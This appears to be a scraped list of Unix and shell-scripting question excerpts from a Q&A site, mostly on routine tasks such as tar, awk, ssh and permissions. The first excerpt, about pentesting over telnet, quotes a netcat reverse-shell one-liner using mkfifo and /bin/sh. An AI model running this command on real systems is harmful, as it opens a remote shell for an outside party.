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Trying to understand telnet behavior and pentesting reverse shell in Unix

The first not working for me and the second working on telnet session, Unix: What is the difference between: .RUN rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip 4444 >/tmp/f And ...
Amir Niko's user avatar
1 vote
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How to let root use sudoedit as if it was a user?

I'm writing a wrapper for myself around vim that detects when the user's trying to edit a file that doesn't belong to them, and suggests sudoedit or visudo instead. I want to use sudoedit rather than ...
aaaalz's user avatar
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How to detox filenames in a bash script with no errors posted?

OS: Kubuntu 22.04.4 LTS x86_64 detox 1.4.5 To display above: neofetch --stdout |grep 'OS:' detox -V Here is a toxic filename, starts with s1: s1 Ä Ö Ü - ä ö ü Science & < > " 1 \ 2 ⁄ 3 ...
joseph22's user avatar
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Broken pipe, write error: An epidemic of unnecessary output

In the last few months, a problem has been spreading across my systems. That of broken pipe errors: # Solution: # silenced by replacing /bin/bzip2 -> bzip2-reference # to /bin/...
Hincor's user avatar
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How can I use the last changed file as an argument in linux?

I'm thinking of using the last changed file as an argument to commands like ls, echo, or cat, is there a simple and efficient way? this question arose when I was faced with analyzing the latest log ...
Ilgar's user avatar
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Shell command to tar directory excluding certain folders

In Bash 4, I want make a tar.gz with excluded folders, and while tons of answers about this simple case exist, nothing works in my case. I would like to keep the directory mentioned in exclude, ...
VOX's user avatar
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awk string replacement - properly escape '&' character

I am working on one of our applications to update the docker image from using static configs for each environment to a single template using dynamic variable insertion with awk. Our Dockerfile calls a ...'s user avatar
0 votes
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tail -f nohup.out gives cannot open 'nohup.out' for reading: No such file or directory

I connected to a remote server using ssh protocol and launched this command in order to run my python script remotely: nohup python3.8 -u > log_15_09_2023.txt & This works fine since if ...
tail's user avatar
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How do I create a shell script that will exit the ssh session after executing the remote commands

I'm trying to write a bash script to compile and deploy some code to a remote server. So far I have been struggling to figure out how to get the script to exit the ssh session. I thought I could just ...
pbuchheit's user avatar
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Why UNIX socket files end with and equal sign in ls?

When I list (ls) files in directory, I see the equal sign = after some files. All these files in my case are UNIX domain socket files: user@Debian11:~/src/unix_sock$ l a.out* cli_stream* ...
NK-cell's user avatar
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Find command in IBM AIX

I would verify that files in the location listed may not have both the other-write and any execute permissions set. This requirement to be applied recursively to files contained within subdirectories. ...
medisamm's user avatar
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Unix/Linux "shutdown": How to prevent wall message and terminal blocking?

I'm making a script that adds a layer of functionality on top of the shutdown command. It's intended to schedule a shutdown a while into the future, and sends out it's own wall message. How do I ...
user avatar
5 votes
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Unix script with a trap inside ssh

My plan is to write a script to debug a remote web server. Since the debug port is blocked by the firewall, I need to forward the remote port via ssh to my local machine. This part is working fine. ...
Johannes von Zmuda's user avatar
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Batch file using WinSCP won't execute UNIX shell script that assigns variables to output of "more" command

I am working with a Batch script that uses WinSCP to transfer files from an UNIX machine to a windows machine. To achieve this, WinSCP has to call shell scripts on the UNIX side. There is one shell ...
Tony E's user avatar
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Need to iterate Backwards in a linux/unix path

I have a script that would have multiple paths (folder names). Each folder path would have a Dockerfile, but its uncertain at what level that file would exist. Lets say my path is "v1/airflow/1....
Mohammed Ali's user avatar
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Output to stdout and external txt file

I am trying to redirect the stdout of a particular output to a txt file, however I would still like to view it in the console log tail -f /var/log/kern.log | ./prsfwlog -f elfs/prs_log.elf | \ grep -E ...
Nir's user avatar
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Setting environment variables using eval - by calling other shell script

I have two shell scripts Caller and getGlobalParameters. There is a function defined in the getGlobalParameters script which calls a java class and uses the values returned by the java class to set ...
Sachin khot's user avatar
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MD5 File Concatenation

dears, can any one help me on here is an example md5 file which contains several checksums. (between the dashes) You will see that 6 are for files in on subdir and 2 are for files in the directory: ---...
Anas Saleh's user avatar
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Unix: How to Exit Out of "/" directory?

I am learning some elements of the Unix environment myself. I have tried to search up this question but perhaps I am not wording it correctly. It is quite possibly a very trivial question, too, but I ...
algebroo's user avatar
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How to change permissions for a file in Ubuntu?

I run the file ./ with the command sudo ./ in /sql directory. But the terminal throws an error: could not change directory to "/sql": Permission denied Script I am ...
lian. lun's user avatar
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Accidentally made an alias for a pre-existing command on OS X

I was toying around with aliases and made an alias to take me to the directory where I store all my bash projects via the cd command. However, I used 'bash' as a name for the alias. Now when I run all ...
Caecilius-rgb's user avatar
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Inodes in External Disk full. Actually not

Checking inode usage: [cold] > df -ih . Filesystem Inodes IUsed IFree IUse% Mounted on /dev/sdb1 59M 59M 7.9K 100% /home/doom/cold Here we see 100% Inode usage. 59 million inodes ...
Tickler_'s user avatar
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How to do a recursive filename `find` from the shell using a glob pattern with "set braces"

From the shell, I'd like to recursively search a directory for a given glob pattern. But I want to use set-braces-syntax in my pattern: find ~/path/to/dir -name '*.{h,m}' Here I'd like to recursively ...
Todd Ditchendorf's user avatar
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How to remove everything between quotation marks in Unix

How do I remove everything between and including single quotes in Unix/Linux? Example: Input : WHERE EnodeB_Fin Date_Time_Fin >= '2022-03-15 00:00:00' Output : WHERE EnodeB_Fin Date_Time_Fin &...
Sam's user avatar
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simple bash script for collecting logs

I'm new with BASH scripting and I need a little help if it's possible. Let's say there's a UNIX server from which I want to gather some simple log events (let's say .txt files). Let's say log events ...
mrk's user avatar
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What does the "cyg" prefix mean?

I've seen so many cyg prefixed things like cygstart, cygpath, cygwin etc., but what exactly does this prefix mean?
Wenfang Du's user avatar
4 votes
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How can I delete all files that have names not ending on exactly 2 digits?

I am currently trying to delete several files. I want to delete all files with file names that do not end on two digits (and when I say ending on two digits I mean it disregarding the .txt file ...
HaskellNoob's user avatar
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How to copy hidden file names to a text file in unix?

I have several directories which contain hidden empty files. I need the name of these file names themselves, so I need to write the filenames to a txt file. My script looks like this: cd /z/...
Fnechz's user avatar
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How to disable ssh non-interactive commands from the server side?

Currently I have a server with openssh7.1 installed, which supports non-interactive commands like : ssh user@server ls. Is there a way to disable such type of command on the server side?
cancantian's user avatar
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How can I add a function inside my .bash_profile?

I need to use a modified grep function to find certain jobs on our cronjob repositories (cvs & git) in a more automated way. So I got these functions already made for that job, but not sure how ...
Gabe Saucedo's user avatar
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Keep Color output with grep at systemctl status

I'm trying to get the original color of the output of this command with grep: sudo systemctl status telegraf | grep -e ● -e Active Output of command with this command the output is red, but i want it ...
Tobias2001's user avatar
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Why does tailing logs with kubectl prevent pipe from producing output? [duplicate]

I'm trying to process logs while tailing them. This command works: kubectl logs "$pod" --tail=100 | egrep pattern | cut -d ' ' -f 1 But this command produces no output: kubectl logs "$...
Dmitry Minkovsky's user avatar
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How to find the first and last occurrence of date field in a log file in linux?

log_file: 2021-08-29 23:25:46,398 IST INFO :......mailslot_create: creating socket for querying route 2021-08-29 23:25:46,398 IST INFO :.....mailbox_register: no mailbox necessary for forward ...
bug24's user avatar
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Creating large number of simlinks

I have 335 pathes to same files (some with different names) DarkestDungeon/colours/default_colour_grade.png DarkestDungeon/dlc/735730_color_of_madness/dungeons/farm/colour_grade.png DarkestDungeon/...
Gribanov's user avatar
3 votes
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tar extracting on root directory is destroying entire system

I'm not sure whats going on... I wasn't aware tar did this. But when I extract a tar on top of the root fs (/) with all the permission stuff turned off... for instance: root@system:~# tar --no-same-...
Sanchke Dellowar's user avatar
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Using mv/cp to replace a invalid symlink with directory

I have a symlink at /tmp/bot which I want to replace with a directory. But I am getting error mv: cannot overwrite non-directory '/tmp/bot' with directory 'log' Steps to reproduce error # Create a ...
Pranjal Doshi's user avatar
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How I remove or erase ls -l | head -3 | tail -l to start over. What command I type?

How do I remove or erase ls -l | head -3 | tail -l to start over. What command should I use? Since my ls -l | head -3 | tail - l has double, isn’t same picture instruction
Cuong Nguyen's user avatar
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To deeply learn how my new Macbook works do I need to learn Unix? [closed]

I've been a Windows person since 1988 and I've bought my first Mac. Yeah thanks. I used to be tech support for Microsoft so it's horrible not knowing deeply how my new machine works. I understand that ...
Luke Puplett's user avatar
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Including chmod in shell script - will it work for everyone?

I have a large file which does a lot of things, but in the end runs tomcat. Problem is that users who run this are experiencing error: no permissions to execute ...
Avaldor's user avatar
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Is there a way to make Unix diff -r compare only differences in filenames, but not check if any single file actually differs?

I need to compare two large directories with a lot of files in them. I tried using: diff -r Directory1 Directory2 but unfortunately the process is really slow due to the amount of files and their ...
Francesco Ghizzo's user avatar
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Understanding umask

I have the following task: What are the rights if you create a file file1 and a directory dir1 and used umask 026 before? Now use umask 233 and perform the following: cat file1 > file2 mv file1 ...
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77 votes
8 answers

"PuTTY key format too new" when using ppk file for PuTTY SSH key authentication

I wanted to connect to my Unix server using SSH keys. For that I had converted my id_rsa file from ./ssh directory to a ppk file using PuTTYgen, but after loading my .ppk key I get this warning: ...
Siddharth Khokhar's user avatar
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Shell Script : Take filename as an argument and on a standard output display the contents of the file with line number prefixed to it

So, I'm new to shell scripting and I'm trying to write a shell script which takes filename(.txt) as an argument and displays the line number prefixed with each line on a standard output. This is the ...
saurabh's user avatar
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How can I execute a command on a remote server through scp?

When using ssh to access raspberry pi running balenaos, ssh -t -p 22222 root@device-ip "balena-engine exec -it <container_name> /bin/sh" grants me access to a specific container inside ...
Ken's user avatar
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Is there an elegant way to move all sub-directories in the current directory to a new sub-directory?

I often run into the following situation. I am in a directory with several sub-directories like so $ls a b c d I would like to archive directories a-d by moving them into a new directory at the same ...
Cole's user avatar
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In bash, how can I list only files?

I'm looking to list only files and directories and no extra data. It's used for parsing the data and I don't need the extra items of file size, permissions...etc. TIA
Dale's user avatar
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How are bash variables containing a file path with non-ascii characters and spaces used as input for commands, cat, exiftool, etc.?

I have set a variable: myvar='/home/user/shares/D/iPhoto\ Library\ Main.migratedphotolibrary/Data.noindex/2002/102008\ \ name\ lname\ event/PICT0002_2_face0.jpg' Then tried to cat this variable: cat ...
Karl's user avatar
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I need to do bulk find and replace

I have file1.txt with these lines abc def ghi file2.txt with these lines jkl mno pqr jkl jkl mno mno mno pqr I want to write a script that replaces all occurrences of the string jkl in file2....
Wasfi's user avatar
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How to rearrange columns when you don't know their initial positions (UNIX, BASH)

I'm having an issue to rearrange columns of a csv file (separator ";"). I know where the columns should be, but not where they are in the first place. Example of file: first_name ; age ; ...
DuDu Advocate's user avatar
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Create new screen with correct environment and at pwd

It's been brought to my attention from my users that the screen command can be made a little easier to use. Initially, calling screen creates a fresh bash environment at the pwd of wherever the user ...
Jeff's user avatar
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